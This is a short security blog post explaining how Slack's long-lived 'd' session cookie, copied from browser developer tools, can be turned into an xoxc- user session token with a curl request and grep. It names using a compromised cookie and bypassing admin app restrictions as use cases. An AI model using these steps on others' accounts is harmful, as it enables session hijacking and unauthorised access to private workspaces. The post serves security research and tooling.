Slack, like many other services, uses cookies to store authentication and session information. What is interesting with Slack, however, is that one particular cookie can be used to generate a user session token, and provide you programatic access as the user who generated it.
This cookie is imaginatively named d, and is available from a browser with an authenticated Slack session.
Getting the d (cookie)
In a browser window, authenticated to Slack and with Slack open, go to developer tools and head to the storage section (in Chrome this is under Application -> Storage)
Under cookies expand app[.]slack[.]com, and you will see all the cookies that Slack stores in the browser for the session.
The one you want to copy is the d cookie, that should start with xoxd-...
Take notice of the expiry date on this cookie, 10 years time. It is very long lived.
Turning this into a User Session Token
This cookie can used in a HTTP request to a Slack workspace the user has access to to retrieve a user session token, which will begin xoxc-..., this token can then be used in place of a user or bot token for the Slack API.
Make a cURL request to a workspace you know the user has access to. I know that the user cookie I’ve got has access to the slack domain westeros-inc, so I send a cURL request like this:
curl -L --cookie "d=xoxd-REDACTED" https://westeros-inc.slack.comIn the response, amongst other things, Slack returns the user session token in JSON data under the api_token key:
We can pipe this output to grep against a regex pattern to get the user session value:
curl -L --silent --cookie "d=xoxd-REDACTED" https://westeros-inc.slack.com | grep -ioE "(xox[a-zA-Z]-[a-zA-Z0-9-]+)"
Using this token
This token can be used in place of a user (xoxp-) or bot (xoxb-) token for API authentication to Slack:
Use Cases
There are two main use cases for this user session token:
- Getting programatic access to Slack workspaces where app installation is restricted by Admin policy
- Turning a compromised Slack cookie from a browser session into programatic access to Slack
Or, in a shameless plug, a Slack cookie can be used with Slack Watchman to enumerate workspaces and find exposed secrets.
Pingback: Slack Watchman Version 4.0.0 Release – PaperMtn